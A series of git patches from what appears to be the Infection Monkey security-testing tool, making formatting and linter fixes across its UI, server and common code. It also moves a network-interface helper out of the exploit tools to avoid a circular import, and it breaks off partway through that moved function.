--git a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg index 50dcc6726..0951d7ae2 100644 --- a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg +++ b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg @@ -1 +1,23 @@ -im-alert-network-icon \ No newline at end of file + + im-alert-network-icon + + + + + + + + + + + + + + + + + + + + + diff --git a/monkey/monkey_island/cc/ui/src/index.html b/monkey/monkey_island/cc/ui/src/index.html index 3e7028fc1..38b0c114d 100644 --- a/monkey/monkey_island/cc/ui/src/index.html +++ b/monkey/monkey_island/cc/ui/src/index.html @@ -8,6 +8,6 @@ -
    +
    diff --git a/monkey/monkey_island/cc/ui/src/index.js b/monkey/monkey_island/cc/ui/src/index.js index 329e94dfe..b2c79eaf9 100644 --- a/monkey/monkey_island/cc/ui/src/index.js +++ b/monkey/monkey_island/cc/ui/src/index.js @@ -6,4 +6,4 @@ import App from './components/Main'; import Bootstrap from 'bootstrap/dist/css/bootstrap.css'; // eslint-disable-line no-unused-vars // Render the main component into the dom -ReactDOM.render(, document.getElementById('app')); +ReactDOM.render(, document.getElementById('app')); diff --git a/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js b/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js index 1c5814b5a..452bfaede 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js @@ -1,6 +1,6 @@ import BaseConfig from './BaseConfig'; -class AwsConfig extends BaseConfig{ +class AwsConfig extends BaseConfig { isAuthEnabled() { return true; } diff --git a/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js b/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js index 359b21bfb..167d1ab60 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js @@ -1,6 +1,6 @@ import BaseConfig from './BaseConfig'; -class PasswordConfig extends BaseConfig{ +class PasswordConfig extends BaseConfig { isAuthEnabled() { return true; } diff --git a/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js b/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js index f549f7112..c3ace9a97 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js @@ -2,7 +2,7 @@ import BaseConfig from './BaseConfig'; class StandardConfig extends BaseConfig { - isAuthEnabled () { + isAuthEnabled() { return false; } } diff --git a/monkey/monkey_island/cc/ui/src/services/AuthService.js b/monkey/monkey_island/cc/ui/src/services/AuthService.js index 9c62bde63..3fb70c5bb 100644 --- a/monkey/monkey_island/cc/ui/src/services/AuthService.js +++ b/monkey/monkey_island/cc/ui/src/services/AuthService.js @@ -1,4 +1,4 @@ -import { SHA3 } from 'sha3'; +import {SHA3} from 'sha3'; import decode from 'jwt-decode'; export default class AuthService { @@ -97,8 +97,7 @@ export default class AuthService { _isTokenExpired(token) { try { return decode(token)['exp'] < Date.now() / 1000; - } - catch (err) { + } catch (err) { return false; } } diff --git a/monkey/monkey_island/cc/ui/src/styles/App.css b/monkey/monkey_island/cc/ui/src/styles/App.css index 109f1c147..12a430cf9 100644 --- a/monkey/monkey_island/cc/ui/src/styles/App.css +++ b/monkey/monkey_island/cc/ui/src/styles/App.css @@ -74,14 +74,17 @@ body { background: #e9e9e9; text-decoration: none; } + li a.active { background: #333333; text-decoration: none; color: #ffcc00; } + li a.active:hover { color: #ffcc00; } + li a.disabled { color: #666; cursor: auto; @@ -190,6 +193,7 @@ body { .nav > li > a:focus { background-color: transparent !important; } + /* * Run Monkey Page */ @@ -226,13 +230,16 @@ body { font-size: 20px; } + .preview-pane h3 small { margin-top: 0.5em; display: block; } + .preview-pane h3 .fa { margin-right: 5px; } + .preview-pane h4 { text-transform: uppercase; color: #999; @@ -240,7 +247,7 @@ body { margin-top: 0; } -.preview-pane .table tr:first-child th , .preview-pane .table tr:first-child td { +.preview-pane .table tr:first-child th, .preview-pane .table tr:first-child td { border-top: 0; } @@ -299,7 +306,7 @@ body { left: 0; right: 0; height: 130px; - background: rgba(0,0,0,0.7); + background: rgba(0, 0, 0, 0.7); border-radius: 5px; border: 3px solid #aaa; padding: 0.5em; @@ -329,7 +336,7 @@ body { padding: 0; } -.data-table-container > .container th , .data-table-container > .container td { +.data-table-container > .container th, .data-table-container > .container td { padding: 15px 8px; } @@ -341,7 +348,7 @@ body { margin-left: 1em; } -#search-field , #page-menu { +#search-field, #page-menu { margin-left: 0.5em; margin-bottom: 1em; height: 34px; @@ -477,21 +484,21 @@ body { } .alert-danger { - color:#a94442 !important; - background-color:#f2dede !important; - border-color:#ebccd1 !important; + color: #a94442 !important; + background-color: #f2dede !important; + border-color: #ebccd1 !important; } .alert-success { - color:#3c763d !important; - background-color:#dff0d8 !important; - border-color:#d6e9c6 !important; + color: #3c763d !important; + background-color: #dff0d8 !important; + border-color: #d6e9c6 !important; } .alert-info { - color:#31708f !important; - background-color:#d9edf7 !important; - border-color:#bce8f1 !important; + color: #31708f !important; + background-color: #d9edf7 !important; + border-color: #bce8f1 !important; } .label-default { @@ -529,7 +536,7 @@ body { margin-bottom: 20px; } -.attack-report .btn-collapse span:nth-of-type(2){ +.attack-report .btn-collapse span:nth-of-type(2) { flex: 0; } @@ -580,7 +587,7 @@ body { margin-right: auto; } -.attack-report.footer-text{ +.attack-report.footer-text { text-align: right; font-size: 0.8em; margin-top: 20px; diff --git a/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss b/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss index 3bf0281f6..b18908c5e 100644 --- a/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss +++ b/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss @@ -6,100 +6,105 @@ $green: #44CF6C; $black: #000000; .ui-checkbox-btn { - position: relative; - display: inline-block; - background-color: rgba(red, .6); + position: relative; + display: inline-block; + background-color: rgba(red, .6); text-align: center; width: 100%; height: 100%; - input { display: none; } + input { + display: none; + } - .icon, - .text { - display: inline-block; - color: inherit; - } + .icon, + .text { + display: inline-block; + color: inherit; + } - .text { + .text { padding-top: 4px; - font-size: 14px; - } + font-size: 14px; + } - // color states - &.is-unchecked { - background-color: transparent; - color: $black; - fill: $black; - } + // color states + &.is-unchecked { + background-color: transparent; + color: $black; + fill: $black; + } &.blocked { background-color: $dark-green; - color: $light-grey; - fill: $light-grey; + color: $light-grey; + fill: $light-grey; } - &.is-checked { - background-color: $green; - color: white; - fill: white; - } + &.is-checked { + background-color: $green; + color: white; + fill: white; + } } .icon { - position: relative; - display: inline-block; + position: relative; + display: inline-block; - svg { - position: absolute; - top: 0; right: 0; bottom: 0; left: 0; - margin: auto; - width: 16px; - height: auto; - fill: inherit; - } + svg { + position: absolute; + top: 0; + right: 0; + bottom: 0; + left: 0; + margin: auto; + width: 16px; + height: auto; + fill: inherit; + } - .is-checked & { - color: white; - fill: white; - } + .is-checked & { + color: white; + fill: white; + } } // ping animation magic .ui-btn-ping { - position: absolute; - top: 50%; - left: 50%; - width: 100%; - transform: translate3d(-50%, -50%, 0); // center center by default + position: absolute; + top: 50%; + left: 50%; + width: 100%; + transform: translate3d(-50%, -50%, 0); // center center by default - // set the square - &:before { - content: ''; - transform: scale(0, 0); // center center by default - transition-property: background-color transform; - transition-timing-function: cubic-bezier(0.0, 0.0, 0.2, 1); - display: block; - padding-bottom: 100%; - border-radius: 50%; - background-color: rgba(white, .84);; - } + // set the square + &:before { + content: ''; + transform: scale(0, 0); // center center by default + transition-property: background-color transform; + transition-timing-function: cubic-bezier(0.0, 0.0, 0.2, 1); + display: block; + padding-bottom: 100%; + border-radius: 50%; + background-color: rgba(white, .84);; + } - .do-ping &:before { - transform: scale(2.5, 2.5); - transition-duration: .35s; - background-color: rgba(white, .08); - } + .do-ping &:before { + transform: scale(2.5, 2.5); + transition-duration: .35s; + background-color: rgba(white, .08); + } } -.icon-checked{ - color:$green +.icon-checked { + color: $green } -.icon-mandatory{ - color:$dark-green +.icon-mandatory { + color: $dark-green } -.icon-unchecked{ - color:$black; +.icon-unchecked { + color: $black; } diff --git a/monkey/monkey_island/cc/ui/src/styles/Collapse.scss b/monkey/monkey_island/cc/ui/src/styles/Collapse.scss index e2d7d334a..9277400b8 100644 --- a/monkey/monkey_island/cc/ui/src/styles/Collapse.scss +++ b/monkey/monkey_island/cc/ui/src/styles/Collapse.scss @@ -14,8 +14,8 @@ $default-color: #e0ddde; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } -.collapse-item button span:first-child{ - text-align:left; +.collapse-item button span:first-child { + text-align: left; } .collapse-item button { @@ -25,7 +25,8 @@ $default-color: #e0ddde; transition: background-color $transition; display: flex; font-family: inherit; - > span { + + > span { display: inline-block; flex: 4; text-align: right; @@ -50,6 +51,7 @@ $default-color: #e0ddde; .collapse-item { padding: 0.5rem; + &--active { .btn-collapse { background-color: #f7f7f7; @@ -61,7 +63,7 @@ $default-color: #e0ddde; padding: 0 7px 7px 7px; border: 2px solid rgb(232, 228, 228); border-top: 0; - display:block !important; + display: block !important; transition: height $transition; overflow: hidden; } @@ -75,12 +77,15 @@ $default-color: #e0ddde; &.collapsing { transform: translateY(-$offset); } + &.collapse-comp { transform: translateY(-$offset); } + &.expanding { transform: translateX(0px); } + &.expanded { transform: translateX(0px); } diff --git a/monkey/monkey_island/cc/utils.py b/monkey/monkey_island/cc/utils.py index 58dff1f5a..01c69e648 100644 --- a/monkey/monkey_island/cc/utils.py +++ b/monkey/monkey_island/cc/utils.py @@ -10,7 +10,6 @@ from ring import lru __author__ = 'Barak' - # Local ips function if sys.platform == "win32": def local_ips(): @@ -19,6 +18,7 @@ if sys.platform == "win32": else: import fcntl + def local_ips(): result = [] try: From e627c8c85742764bfe1e6c481908a0cc2a6142fc Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:14:22 +0200 Subject: [PATCH 35/53] Manual fix - auto formatter failed --- monkey/monkey_island/cc/resources/telemetry_feed.py | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py index 8a8c750b4..6333f2feb 100644 --- a/monkey/monkey_island/cc/resources/telemetry_feed.py +++ b/monkey/monkey_island/cc/resources/telemetry_feed.py @@ -22,9 +22,8 @@ class TelemetryFeed(flask_restful.Resource): if "null" == timestamp or timestamp is None: # special case to avoid ugly JS code... telemetries = mongo.db.telemetry.find({}) else: - telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) \ - \ - telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) + telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) + telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) try: return \ From dd461b974b219506083d243d68758ad589a5737c Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:20:29 +0200 Subject: [PATCH 36/53] Manual fix - auto formatter is confused again :-1: --- .../cc/services/reporting/aws_exporter.py | 34 +++++++++---------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 19293f991..1df12e2eb 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -208,9 +208,9 @@ class AWSExporter(Exporter): description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " "over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - ssh_key=issue['ssh_key']), + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -224,8 +224,8 @@ class AWSExporter(Exporter): description="Update your Elastic Search server to version 1.4.3 and up.", recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], - issue['ip_address']), + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -269,7 +269,7 @@ class AWSExporter(Exporter): recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " "shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -284,9 +284,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " "protocol with user {2} and its password.".format( - issue['machine'], - issue['ip_address'], - issue['username']), + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -301,9 +301,9 @@ class AWSExporter(Exporter): "network.", recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " "the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -318,9 +318,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " "pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -361,7 +361,7 @@ class AWSExporter(Exporter): description="This critical machine is open to attacks via strong users with access to it.", recommendation="The services: {services} have been found on the machine thus classifying it as a critical " "machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -386,7 +386,7 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=10, title="Oracle WebLogic servers are vulnerable to remote code execution.", - description="Install Oracle critical patch updates. Or update to the latest version. " \ + description="Install Oracle critical patch updates. Or update to the latest version. " "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack." "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " From 1f598579ee178f651c8a5050837b3453d1f7570a Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:22:14 +0200 Subject: [PATCH 37/53] Linter fixes in `common` --- monkey/common/cloud/aws_instance.py | 2 -- monkey/common/cloud/aws_service.py | 1 - monkey/common/cmd/aws/aws_cmd_result.py | 1 - monkey/common/data/__init__.py | 1 + monkey/common/data/network_consts.py | 1 - monkey/common/data/zero_trust_consts.py | 2 +- monkey/common/network/network_range.py | 3 +-- monkey/common/utils/code_utils.py | 2 -- monkey/common/utils/mongo_utils.py | 1 - 9 files changed, 3 insertions(+), 11 deletions(-) diff --git a/monkey/common/cloud/aws_instance.py b/monkey/common/cloud/aws_instance.py index 5178b0938..4339fbcf4 100644 --- a/monkey/common/cloud/aws_instance.py +++ b/monkey/common/cloud/aws_instance.py @@ -4,14 +4,12 @@ import urllib.request import urllib.error import logging - __author__ = 'itay.mizeretz' AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254" AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS) ACCOUNT_ID_KEY = "accountId" - logger = logging.getLogger(__name__) diff --git a/monkey/common/cloud/aws_service.py b/monkey/common/cloud/aws_service.py index b435b23c7..6ef385542 100644 --- a/monkey/common/cloud/aws_service.py +++ b/monkey/common/cloud/aws_service.py @@ -14,7 +14,6 @@ COMPUTER_NAME_KEY = 'ComputerName' PLATFORM_TYPE_KEY = 'PlatformType' IP_ADDRESS_KEY = 'IPAddress' - logger = logging.getLogger(__name__) diff --git a/monkey/common/cmd/aws/aws_cmd_result.py b/monkey/common/cmd/aws/aws_cmd_result.py index c8647bfe4..3499f8d14 100644 --- a/monkey/common/cmd/aws/aws_cmd_result.py +++ b/monkey/common/cmd/aws/aws_cmd_result.py @@ -1,6 +1,5 @@ from common.cmd.cmd_result import CmdResult - __author__ = 'itay.mizeretz' diff --git a/monkey/common/data/__init__.py b/monkey/common/data/__init__.py index a379a4743..978540b10 100644 --- a/monkey/common/data/__init__.py +++ b/monkey/common/data/__init__.py @@ -1,2 +1,3 @@ from .zero_trust_consts import populate_mappings + populate_mappings() diff --git a/monkey/common/data/network_consts.py b/monkey/common/data/network_consts.py index 5fc9d6d8a..b194c9421 100644 --- a/monkey/common/data/network_consts.py +++ b/monkey/common/data/network_consts.py @@ -1,2 +1 @@ ES_SERVICE = 'elastic-search-9200' - diff --git a/monkey/common/data/zero_trust_consts.py b/monkey/common/data/zero_trust_consts.py index ae27b1c35..7135485da 100644 --- a/monkey/common/data/zero_trust_consts.py +++ b/monkey/common/data/zero_trust_consts.py @@ -58,7 +58,7 @@ PRINCIPLES = { PRINCIPLE_DATA_TRANSIT: "Secure data at transit by encrypting it.", PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.", PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandetory " - "Access Control) only.", + "Access Control) only.", } POSSIBLE_STATUSES_KEY = "possible_statuses" diff --git a/monkey/common/network/network_range.py b/monkey/common/network/network_range.py index 7393ceda2..6a1201e07 100644 --- a/monkey/common/network/network_range.py +++ b/monkey/common/network/network_range.py @@ -59,7 +59,7 @@ class NetworkRange(object, metaclass=ABCMeta): ips = address_str.split('-') try: ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1]) - except ValueError as e: + except ValueError: return False return True return False @@ -173,4 +173,3 @@ class SingleIpRange(NetworkRange): return None, string_ # If a string_ was entered instead of IP we presume that it was domain name and translate it return ip, domain_name - diff --git a/monkey/common/utils/code_utils.py b/monkey/common/utils/code_utils.py index b50e01fb0..214e6d108 100644 --- a/monkey/common/utils/code_utils.py +++ b/monkey/common/utils/code_utils.py @@ -1,5 +1,3 @@ - - # abstract, static method decorator # noinspection PyPep8Naming class abstractstatic(staticmethod): diff --git a/monkey/common/utils/mongo_utils.py b/monkey/common/utils/mongo_utils.py index 48d632bcd..854109b30 100644 --- a/monkey/common/utils/mongo_utils.py +++ b/monkey/common/utils/mongo_utils.py @@ -80,4 +80,3 @@ class MongoUtils: continue return row - From 530e1a3b658748841998d6fcab698cdf4c58c504 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:25:37 +0200 Subject: [PATCH 38/53] Whitespace fixes --- monkey/common/cloud/aws_service_test.py | 10 +++++----- monkey/infection_monkey/network/info.py | 5 ----- 2 files changed, 5 insertions(+), 10 deletions(-) diff --git a/monkey/common/cloud/aws_service_test.py b/monkey/common/cloud/aws_service_test.py index ae9c4b5d3..cbcbfebcd 100644 --- a/monkey/common/cloud/aws_service_test.py +++ b/monkey/common/cloud/aws_service_test.py @@ -10,14 +10,14 @@ class TestFilterInstanceDataFromAwsResponse(TestCase): def test_filter_instance_data_from_aws_response(self): json_response_full = """ { - "InstanceInformationList": [ - { + "InstanceInformationList": [ + { "ActivationId": "string", "AgentVersion": "string", - "AssociationOverview": { + "AssociationOverview": { "DetailedStatus": "string", - "InstanceAssociationStatusAggregatedCount": { - "string" : 6 + "InstanceAssociationStatusAggregatedCount": { + "string" : 6 } }, "AssociationStatus": "string", diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index 1418c22cc..6b9c5811e 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -47,24 +47,19 @@ def get_host_subnets(): if is_windows_os(): - def local_ips(): local_hostname = socket.gethostname() return socket.gethostbyname_ex(local_hostname)[2] - def get_routes(): raise NotImplementedError() - else: from fcntl import ioctl - def local_ips(): valid_ips = [network['addr'] for network in get_host_subnets()] return valid_ips - def get_routes(): # based on scapy implementation for route parsing try: f = open("/proc/net/route", "r") From 933dc9c3783671496be837b49c78bca39414272f Mon Sep 17 00:00:00 2001 From: Shivank Date: Wed, 30 Oct 2019 11:06:25 +0530 Subject: [PATCH 39/53] Second File-saver patch --- .../cc/ui/src/components/pages/ConfigurePage.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index a5aeae3ec..5cbd758cf 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js @@ -1,7 +1,7 @@ import React from 'react'; import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; -import FileSaver from "file-saver"; +import FileSaver from 'file-saver'; import AuthComponent from '../AuthComponent'; import { FilePond } from 'react-filepond'; import 'filepond/dist/filepond.min.css'; @@ -309,10 +309,10 @@ class ConfigurePageComponent extends AuthComponent { exportConfig = () => { this.updateConfigSection(); - const JSONString = JSON.stringify(this.state.configuration, null, 2); - const blob = new Blob([JSONString], {type: "text/plain;charset=utf-8"}); + const configAsJson = JSON.stringify(this.state.configuration, null, 2); + const configAsBinary = new Blob([configAsJson], {type: "text/plain;charset=utf-8"}); - FileSaver.saveAs(blob, 'monkey.conf'); + FileSaver.saveAs(configAsBinary, 'monkey.conf'); }; sendConfig() { From 2517ab02843dd5f5b944b85b63388406053bdd99 Mon Sep 17 00:00:00 2001 From: Daniel Goldberg Date: Wed, 30 Oct 2019 15:28:57 +0200 Subject: [PATCH 40/53] Move get_interface_to_target to network, helping prevent a circular import between pba.py and exploiter modules. --- monkey/infection_monkey/exploit/sambacry.py | 2 +- monkey/infection_monkey/exploit/sshexec.py | 3 +- .../infection_monkey/exploit/tools/helpers.py | 44 ------------------- .../exploit/tools/http_tools.py | 3 +- .../exploit/tools/smb_tools.py | 3 +- monkey/infection_monkey/exploit/weblogic.py | 2 +- monkey/infection_monkey/monkey.py | 2 +- monkey/infection_monkey/network/tools.py | 40 +++++++++++++++++ .../post_breach/actions/users_custom_pba.py | 2 +- monkey/infection_monkey/transport/http.py | 2 +- monkey/infection_monkey/tunnel.py | 3 +- 11 files changed, 51 insertions(+), 55 deletions(-) diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py index e3825eac9..5a39f485b 100644 --- a/monkey/infection_monkey/exploit/sambacry.py +++ b/monkey/infection_monkey/exploit/sambacry.py @@ -20,7 +20,7 @@ from infection_monkey.exploit import HostExploiter from infection_monkey.model import DROPPER_ARG from infection_monkey.network.smbfinger import SMB_SERVICE from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target from infection_monkey.pyinstaller_utils import get_binary_file_path from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index 4a88c4593..a7e9571b5 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -7,10 +7,9 @@ import paramiko import infection_monkey.monkeyfs as monkeyfs from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline -from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.model import MONKEY_ARG +from infection_monkey.network.tools import check_tcp_port, get_interface_to_target from infection_monkey.exploit.tools.exceptions import FailedExploitationError -from infection_monkey.network.tools import check_tcp_port from common.utils.exploit_enum import ExploitType from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem diff --git a/monkey/infection_monkey/exploit/tools/helpers.py b/monkey/infection_monkey/exploit/tools/helpers.py index 91a25c270..8e2b1342d 100644 --- a/monkey/infection_monkey/exploit/tools/helpers.py +++ b/monkey/infection_monkey/exploit/tools/helpers.py @@ -1,52 +1,8 @@ import logging -import socket -import struct -import sys - -from infection_monkey.network.info import get_routes LOG = logging.getLogger(__name__) -def get_interface_to_target(dst): - """ - :param dst: destination IP address string without port. E.G. '192.168.1.1.' - :return: IP address string of an interface that can connect to the target. E.G. '192.168.1.4.' - """ - if sys.platform == "win32": - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - try: - s.connect((dst, 1)) - ip_to_dst = s.getsockname()[0] - except KeyError: - LOG.debug("Couldn't get an interface to the target, presuming that target is localhost.") - ip_to_dst = '127.0.0.1' - finally: - s.close() - return ip_to_dst - else: - # based on scapy implementation - - def atol(x): - ip = socket.inet_aton(x) - return struct.unpack("!I", ip)[0] - - routes = get_routes() - dst = atol(dst) - paths = [] - for d, m, gw, i, a in routes: - aa = atol(a) - if aa == dst: - paths.append((0xffffffff, ("lo", a, "0.0.0.0"))) - if (dst & m) == (d & m): - paths.append((m, (i, a, gw))) - if not paths: - return None - paths.sort() - ret = paths[-1][1] - return ret[1] - - def try_get_target_monkey(host): src_path = get_target_monkey(host) if not src_path: diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py index 297e064fc..56bb5ef1f 100644 --- a/monkey/infection_monkey/exploit/tools/http_tools.py +++ b/monkey/infection_monkey/exploit/tools/http_tools.py @@ -7,7 +7,8 @@ from threading import Lock from infection_monkey.network.firewall import app as firewall from infection_monkey.network.info import get_free_tcp_port from infection_monkey.transport import HTTPServer, LockedHTTPServer -from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target +from infection_monkey.exploit.tools.helpers import try_get_target_monkey +from infection_monkey.network.tools import get_interface_to_target from infection_monkey.model import DOWNLOAD_TIMEOUT __author__ = 'itamar' diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py index 51564518e..80d9c73f7 100644 --- a/monkey/infection_monkey/exploit/tools/smb_tools.py +++ b/monkey/infection_monkey/exploit/tools/smb_tools.py @@ -10,8 +10,9 @@ import infection_monkey.config import infection_monkey.monkeyfs as monkeyfs from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target from infection_monkey.config import Configuration + __author__ = 'itamar' LOG = logging.getLogger(__name__) diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py index ac648012b..e15625918 100644 --- a/monkey/infection_monkey/exploit/weblogic.py +++ b/monkey/infection_monkey/exploit/weblogic.py @@ -9,7 +9,7 @@ from http.server import BaseHTTPRequestHandler, HTTPServer from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit import HostExploiter -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target from infection_monkey.network.info import get_free_tcp_port from http.server import BaseHTTPRequestHandler, HTTPServer diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 3985c8a2e..98e2bf286 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -25,7 +25,7 @@ from infection_monkey.telemetry.trace_telem import TraceTelem from infection_monkey.telemetry.tunnel_telem import TunnelTelem from infection_monkey.windows_upgrader import WindowsUpgrader from infection_monkey.post_breach.post_breach_handler import PostBreach -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError from infection_monkey.telemetry.attack.t1106_telem import T1106Telem from common.utils.attack_utils import ScanStatus, UsageEnum diff --git a/monkey/infection_monkey/network/tools.py b/monkey/infection_monkey/network/tools.py index 0cac7b627..0c8d0417b 100644 --- a/monkey/infection_monkey/network/tools.py +++ b/monkey/infection_monkey/network/tools.py @@ -7,6 +7,7 @@ import struct import time import re +from infection_monkey.network.info import get_routes from infection_monkey.pyinstaller_utils import get_binary_file_path from infection_monkey.utils.environment import is_64bit_python @@ -269,3 +270,42 @@ def _traceroute_linux(target_ip, ttl): lines = [x[1:-1] if x else None # Removes parenthesis for x in lines] return lines + + +def get_interface_to_target(dst): + """ + :param dst: destination IP address string without port. E.G. '192.168.1.1.' + :return: IP address string of an interface that can connect to the target. E.G. '192.168.1.4.' + """ + if sys.platform == "win32": + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + 